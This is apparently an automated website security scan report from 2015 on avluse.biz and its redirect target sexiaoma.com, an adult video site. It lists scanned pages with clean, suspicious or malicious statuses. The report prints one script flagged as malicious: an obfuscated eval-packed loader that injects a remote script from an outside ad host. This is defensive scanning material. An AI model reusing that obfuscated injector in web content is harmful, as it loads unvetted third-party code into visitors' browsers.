Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=avluse.biz
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.avluse.biz/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 07 Mar 2015 03:34:28 GMT Location: http://www.sexiaoma.com/ Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.sexiaoma.com/ | 200 OK Content-Length: 33659 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: so.avluse.biz ...[1268 bytes skipped]... <body> <div class="wrap"><div class="header"> <div class="logo"><ul id="qire-plus"><li id="history"><a href="javascript:void(0);"><i class="ui-icon new-icon"></i>ææ¾<br />è®°å½</a></li><li><a href="/detail/new.html"><i class="ui-icon help-icon"></i>ä»æ¥<br />æ´æ°</a></li><li><a href="http://so.avluse.biz/gb-show-p-1.html"><i class="ui-icon gb-icon"></i>çè¨<br />åé¦</a></li><li><a target="_self" id="fav" href="javascript:void(0);"><i class="ui-icon fav-icon"></i>æ¶è<br />æ¬ç«</a></li></ul><a href="/"><img src="/Tpl/defalut/images/logo.gif" alt="avæ¸è²"/></a><span><script type="text/javascript" src="/Runtime/js/header.js" charset="utf-8"></script></span ...[2887 bytes skipped]... | ||
http://www.sexiaoma.com/Public/jquery/jquery-1.7.2.min.js | 200 OK Content-Length: 95330 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Public/jquery/jquery.autocomplete-1.1.js | 200 OK Content-Length: 14091 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Public/jquery/jquery.lazyload-1.8.4.js | 200 OK Content-Length: 3205 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Tpl/defalut/js/home.js | 200 OK Content-Length: 14919 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/header.js | 200 OK Content-Length: 214 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/top960.js | 200 OK Content-Length: 84 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/indextop.js | 200 OK Content-Length: 19 Content-Type: application/x-javascript | clean |
http://js.users.51.la/16853280.js | 200 OK Content-Length: 1947 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/index960.js | 200 OK Content-Length: 153 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/detail/new.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 07 Mar 2015 03:34:45 GMT Location: http://www.sexiaoma.com/detail/new.html Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.sexiaoma.com/detail/new.html | 200 OK Content-Length: 19769 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: so.avluse.biz ...[1254 bytes skipped]... lt;body> <div class="wrap"> <div class="header"> <div class="logo"><ul id="qire-plus"><li id="history"><a href="javascript:void(0);"><i class="ui-icon new-icon"></i>ææ¾<br />è®°å½</a></li><li><a href="/detail/new.html"><i class="ui-icon help-icon"></i>ä»æ¥<br />æ´æ°</a></li><li><a href="http://so.avluse.biz/gb-show-p-1.html"><i class="ui-icon gb-icon"></i>çè¨<br />åé¦</a></li><li><a target="_self" id="fav" href="javascript:void(0);"><i class="ui-icon fav-icon"></i>æ¶è<br />æ¬ç«</a></li></ul><a href="/"><img src="/Tpl/defalut/images/logo.gif" alt="avæ¸è²"/></a><span><script type="text/javascript" src="/Runtime/js/header.js" charset="utf-8"></script></span ...[2884 bytes skipped]... | ||
http://www.sexiaoma.com/Public/jquery/jquery.autocomplete-1.1.js | 200 OK Content-Length: 14091 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/listfoot.js | 200 OK Content-Length: 599 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write ('<!--å³ä¸è§ç¹å»_CPC-->');eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('a.9(\'<0 b="d://c.4.2:5/8.6?e=k&j=7&l=3&f=i&h=&g=1"></0>\');',22,22,'script||cc||cpva|899|aspx||cf|write|document|src|vpn|http|action|username|cycsel|lowunionnsername|zhuzhujun|ad_class|cycteamget|cycteamid'.split('|'),0,{})) Antivirus reports:
http://www.avluse.biz/1/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 07 Mar 2015 03:34:49 GMT Location: http://www.sexiaoma.com/1/ Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.sexiaoma.com/1/ | 200 OK Content-Length: 14710 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: so.avluse.biz ...[1183 bytes skipped]... body> <div class="wrap"> <div class="header"> <div class="logo"><ul id="qire-plus"><li id="history"><a href="javascript:void(0);"><i class="ui-icon new-icon"></i>ææ¾<br />è®°å½</a></li><li><a href="/detail/new.html"><i class="ui-icon help-icon"></i>ä»æ¥<br />æ´æ°</a></li><li><a href="http://so.avluse.biz/gb-show-p-1.html"><i class="ui-icon gb-icon"></i>çè¨<br />åé¦</a></li><li><a target="_self" id="fav" href="javascript:void(0);"><i class="ui-icon fav-icon"></i>æ¶è<br />æ¬ç«</a></li></ul><a href="/"><img src="/Tpl/defalut/images/logo.gif" alt="avæ¸è²"/></a><span><script type="text/javascript" src="/Runtime/js/header.js" charset="utf-8"></script></span ...[3106 bytes skipped]... | ||
http://www.sexiaoma.com/Public/jquery/jquery.lazyload-1.8.4.js | 200 OK Content-Length: 3205 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: avluse.biz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: avluse.biz
Referer: http://www.google.com/search?q=avluse.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.